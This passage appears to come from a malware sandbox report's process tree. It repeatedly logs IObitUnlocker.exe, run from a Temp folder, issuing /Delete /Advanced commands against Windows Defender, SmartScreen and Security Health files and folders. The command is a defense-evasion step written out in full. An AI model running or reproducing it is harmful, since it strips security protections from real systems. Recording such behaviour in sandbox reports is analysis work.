Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:10024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:10052
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:9264
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1528
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 